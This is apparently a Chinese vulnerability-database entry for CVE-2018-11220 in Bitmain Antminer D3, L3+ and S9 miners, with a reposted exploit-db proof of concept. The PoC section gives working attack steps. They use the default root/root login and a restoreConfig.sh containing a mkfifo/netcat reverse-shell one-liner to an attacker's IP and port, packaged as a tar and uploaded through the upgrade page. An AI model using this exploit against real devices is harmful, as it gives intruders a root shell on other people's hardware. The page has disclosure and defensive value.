Bitmain Antminer D3、L3+和S9 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1125107 漏洞类型
发布时间 2018-05-27 更新时间 2019-10-23
CVE编号 CVE-2018-11220 CNNVD-ID CNNVD-201805-1234
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/44779
https://cxsecurity.com/issue/WLB-2018050253
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201805-1234
|漏洞详情
Bitmain Antminer D3、L3+和S9都是中国比特大陆(Bitmain)Technologies公司的用于挖掘比特币的矿机设备。 Bitmain Antminer D3、L3+和S9中存在安全漏洞。远程攻击者可借助系统恢复功能利用该漏洞执行代码。
|漏洞EXP
# Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution
# Google Dork: N/A
# Date: 27/05/2018
# Exploit Author: Corrado Liotta
# Vendor Homepage: https://www.bitmain.com/
# Software Link: N/A
# Version: Antminer - D3, L3+, S9, and other
# Tested on: Windows/Linux
# CVE : CVE-2018-11220

#Description

The software used by the miners produced by the bitmain (AntMiner) is
affected by a vulnerability of remote code execution type, it is possible
through the "Retore Backup" functionality of the administration portal to
execute commands on the system. This would allow a malicious user with
valid credentials to access the entire file system with administrative
privileges.

#POC

Login on Antminer Configuration Portal (Default Credential: root/root)

1) Create a file named:

restoreConfig.sh

2) insert inside:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port
>/tmp/f

3) Generate archive by inserting the file created before:

Exploit.tar

4) Launch net cat and upload file:

nc -vv -l -p port

system --> upgrade --> upload archive
|参考资料
resource:
hyperlink:https://www.exploit-db.com/exploits/44779/